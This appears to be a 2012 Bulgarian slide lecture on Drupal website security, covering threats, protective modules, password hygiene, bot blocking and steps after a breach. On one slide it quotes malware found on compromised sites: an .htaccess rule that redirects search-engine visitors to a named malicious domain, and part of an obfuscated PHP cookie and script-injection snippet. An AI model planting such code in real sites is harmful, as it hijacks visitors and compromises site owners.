20
СИГУРНОСТ В CMS DRUPAL Общи положения за сигурност на Уеб сайтове София 10.02.2012 г. @init Lab

Drupal security lecture

Embed Size (px)

DESCRIPTION

A short brief on Drupal security in Bulgarian.

Citation preview

Page 1: Drupal security lecture

СИГУРНОСТ В CMS DRUPAL

Общи положения за сигурност на Уеб сайтове

София 10.02.2012 г.

@init Lab

Page 2: Drupal security lecture

Мета – за сигурността на Уеб сайта

Сигурността на Уеб сайта е задължение на администратора;

тя е основна част от изграждането на сайта;

дадена информация не съществува, ако не е налична на три места.

@init Lab

Page 3: Drupal security lecture

Принципни положения при злонамерен достъп

- изтриване на информация или подмяна на страница с друга и компрометиращо съдържание;

- извличане на лични данни на потребителите в сайта;

- пренасочване при достъпване от референтен сървър, към сайт с компрометиращо съдържание.

@init Lab

Page 4: Drupal security lecture

Примери-злонамерен код в .htaccess

RewriteEngine OnRewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteRule ^(.*)$ http://peace-security.ru/mod/index.php [R=301,L]

- злонамерен код в PHP файлове

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";...

@init Lab

Page 5: Drupal security lecture

@init Lab

Примери

Обхождане на лош бот

Опит за оторизиране на несъществуващ потребител

Page 6: Drupal security lecture

Основни методи за защита на информацията и сайта:

- използване на криптирана връзка за оторизация(SSL логин);- оторизация на потребителски роли по IP адрес;- акуратни права на потребителите в системата;- рестрикции относно форматите за въвеждане;- защита на формуляра за оторизация;- следене дневника (log) за възможни проблеми;- вграждане на модул за архивиране на базата данни и файловете на сайта;- обновяване на ядрото/модули на системата;

@init Lab

Page 7: Drupal security lecture

Основни методи за защита на информацията и сайта - изисквания:

- SSL (статичен ip адрес на хоста и генериране на сертификат – собствен, от свободна институция, или от оторизиран източник). Инвестиция в рамките на 24-50 лв на година със закупен сертификат. (http://cacert.org/ - собствен серт.)

- статичен ip адрес за управление, влиза в пакета на някои Интернет достачици. Инвестиция в рамките на 25-30 лв мес, обезпечава сигурно управление на сайта.

@init Lab

Page 8: Drupal security lecture

Основни методи за защита на информацията и сайта - модули:

- SSL чрез ръчно пренасочване на адрес към https или чрез модул http://drupal.org/project/session443

- ограничаване на достъпа на роля по ip адресhttp://drupal.org/project/restrict_by_ip

- създаване на периодичен архив на базата даннии файловете на сайта (ръчно/автоматизирано) http://drupal.org/project/backup_migrate

* не можах да инициализирам FTP сесия, cron увисва при scheduled backup (за последния модул)

@init Lab

Page 9: Drupal security lecture

Проверка на сигурността на сайтамодули

- преглед на сигурността / действияhttp://drupal.org/project/security_review

- определяне формати за въвеждане според ролята на потребителяhttp://drupal.org/project/better_formats

- проверка състоянието на таблиците в базата данни http://drupal.org/project/schema

@init Lab

Page 10: Drupal security lecture

@init Lab

Екран от модула Security Review

Page 11: Drupal security lecture

Защо паролата не е сигурен метод?

- може да бъде открадната при използване на некриптирана връзка;

- сама по себе си не отговаря за самоличността на въвеждащия (приказката за Али Баба);

- ако не е генерирана софтуерно е възможно да бъде с ниско ниво на сигурност (повтаряемост).

@init Lab

Page 12: Drupal security lecture

Помощни приложения

- ползвайте генератор на паролиhttp://pwgen-win.sourceforge.net/ - криптирайте важната информация - като пароли за достъп до сървъри, на вашия компютърhttp://www.truecrypt.org/

- при размяна на важни пароли по електронната поща използвайте шифроване на данните.http://www.gnupg.org/

@init Lab

Page 13: Drupal security lecture

Екран от приложението PW Gen

@init Lab

Генерирайте паролитена своя компютър.

Page 14: Drupal security lecture

Добрите и лошите

- ботове = X маркер на Вашата врата - злонамерени потребители = Касим (Али Баба)

- пробиващият Системата = Шеф на крадците

Методи за защита – следене на лог записите,блокиране на недобросъвестните потребители /ботове (автоматизирано) по IP адрес, ограничаване достъпа на лоши ботове чрез .htaccess файла

http://blog.superhosting.bg/good-vs-bad-bots.html

@init Lab

Page 15: Drupal security lecture

Да затворим вратата

- ограничаване достъпа на ботове до сайта;http://en.linuxreviews.org/HOWTO_stop_automated_spam-bots_using_.htaccess - автоматизирано известяване за проблеми на сайта (модул http://drupal.org/project/logging_alerts) ;

- блокиране на адреси при опит за brute force attackhttp://drupal.org/project/login_security;

@init Lab

Page 16: Drupal security lecture

@init Lab

Екран за настройкаот модула Login Security

Page 17: Drupal security lecture

При пробив в системата

- ограничете достъпа до сайта само до себе си;- премахнете излишния софтуер от сървъра. - свържете се с хостинг компанията и проверетеза последния наличен архив;- влезте през задната врата (https:// до Вашия сървър) а не през парадния вход – Лошият е вътре;- сменете всички потребителски FTP и пароли и главната за хост акаунта;- свалете базата данни и файловете на системата и ги прегледайте за злонамерен код – за OS Windows може да ви послужи приложениетоhttp://code.google.com/p/dngrep/

@init Lab

Page 18: Drupal security lecture

Защо сигурни сайтове?

- обезпечавате Вашия труд и инвестицията на клиента;

- предотвратявате възможността Интернет страницата да се използва злонамерено от трети лица;

- правите Мрежата по-сигурно място за всички.

@init Lab

Page 19: Drupal security lecture

Допълнителна стойност на Вашия труд

- можете да анализирате сайтове на клиенти за нивото им на сигурност, срещу заплащане;

- можете да имплементирате решения за сигурност;

- можете да сключите договор за абонаментна поддръжка, обновяване на системата и следене за проблеми в сигурността.

@init Lab

Page 20: Drupal security lecture

Все още начинаещ по въпросите за сигурността

Георги Атанасов[email protected]

http://www.novsait.eu

Работи с Друпал и пише темиза версия 6.0, имлементира

SEO и Сигурност на системата

@init Lab